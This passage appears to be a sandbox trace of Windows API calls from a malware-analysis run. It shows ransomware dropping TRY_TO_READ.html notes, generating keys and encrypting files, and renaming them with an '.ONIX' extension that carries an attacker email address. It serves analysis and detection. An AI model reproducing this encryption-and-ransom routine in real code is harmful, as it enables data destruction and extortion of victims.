dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.986] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1c2f6e80, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x1c2f6e80, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0128.986] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0128.986] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.988] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x51034410, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x51034410, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51034410, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0128.988] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0128.988] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.989] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0128.989] CloseHandle (hObject=0x3cc) returned 1 [0128.989] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0128.990] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x8, wMilliseconds=0x172)) [0128.990] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0128.990] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0128.990] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0128.990] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow9c354ca09c354b444c.lock") returned 70 [0128.990] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0128.990] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.991] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.991] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x4daec8 [0128.991] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51034410, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51034410, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0e00 [0128.991] FindNextFileW (in: hFindFile=0x4e0e00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51034410, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51034410, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.991] FindNextFileW (in: hFindFile=0x4e0e00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0128.991] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0128.994] FindNextFileW (in: hFindFile=0x4e0e00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0128.994] FindNextFileW (in: hFindFile=0x4e0e00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0128.995] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0128.997] FindNextFileW (in: hFindFile=0x4e0e00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x51034410, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x51034410, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51034410, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0128.997] FindNextFileW (in: hFindFile=0x4e0e00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x51034410, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x51034410, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51034410, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0128.997] CloseHandle (hObject=0x3cc) returned 1 [0128.997] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0128.997] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x8, wMilliseconds=0x172)) [0128.997] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0128.997] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0128.997] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0128.997] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming9c354ca09c354b444c.lock") returned 69 [0128.997] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0128.998] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.998] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x4db030 [0128.998] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3283a610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3283a610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0e40 [0128.998] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3283a610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3283a610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.999] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b5a930, ftCreationTime.dwHighDateTime=0x1d5e2dd, ftLastAccessTime.dwLowDateTime=0xd0ac98f0, ftLastAccessTime.dwHighDateTime=0x1d5e13b, ftLastWriteTime.dwLowDateTime=0xd0ac98f0, ftLastWriteTime.dwHighDateTime=0x1d5e13b, nFileSizeHigh=0x0, nFileSizeLow=0x11fdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-2rP6.png", cAlternateFileName="")) returned 1 [0128.999] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-2rp6.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0128.999] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0128.999] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x11fdb, nNumberOfBytesToLockHigh=0x0) returned 1 [0128.999] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.999] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.000] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.000] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.000] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.000] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.000] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png", dwFileAttributes=0x80) returned 1 [0129.000] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png") returned 56 [0129.000] GetProcessHeap () returned 0x410000 [0129.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe0) returned 0x461440 [0129.000] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png" [0129.001] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.001] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=73691) returned 1 [0129.001] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x11fdb [0129.001] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.001] GetProcessHeap () returned 0x410000 [0129.001] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.001] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.001] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.006] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.007] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.008] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11fdb) returned 0xf70048 [0129.009] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11fdb) returned 0xf82030 [0129.009] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.009] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x11fdb, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x11fdb, lpOverlapped=0x0) returned 1 [0129.012] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x11fdb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.012] CloseHandle (hObject=0x524) returned 1 [0129.013] GetProcessHeap () returned 0x410000 [0129.013] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.013] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-2rp6.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-2rP6.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-2rp6.png.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.017] GetProcessHeap () returned 0x410000 [0129.017] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0129.017] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x578fcee0, ftCreationTime.dwHighDateTime=0x1d5d8aa, ftLastAccessTime.dwLowDateTime=0xb01c8530, ftLastAccessTime.dwHighDateTime=0x1d5de40, ftLastWriteTime.dwLowDateTime=0xb01c8530, ftLastWriteTime.dwHighDateTime=0x1d5de40, nFileSizeHigh=0x0, nFileSizeLow=0x7426, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-HR1rCTBQI.mp3", cAlternateFileName="-HR1RC~1.MP3")) returned 1 [0129.017] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-hr1rctbqi.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.017] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.017] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7426, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.017] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.017] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.018] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.018] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.018] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.018] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.018] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3", dwFileAttributes=0x80) returned 1 [0129.018] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3") returned 61 [0129.018] GetProcessHeap () returned 0x410000 [0129.018] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x431d68 [0129.018] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3" [0129.018] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.018] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=29734) returned 1 [0129.019] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x7426 [0129.019] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.019] GetProcessHeap () returned 0x410000 [0129.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.019] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.019] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.020] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.021] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.022] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7426) returned 0x4e1b68 [0129.022] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7426) returned 0xf70048 [0129.023] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.023] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x7426, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x7426, lpOverlapped=0x0) returned 1 [0129.025] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, 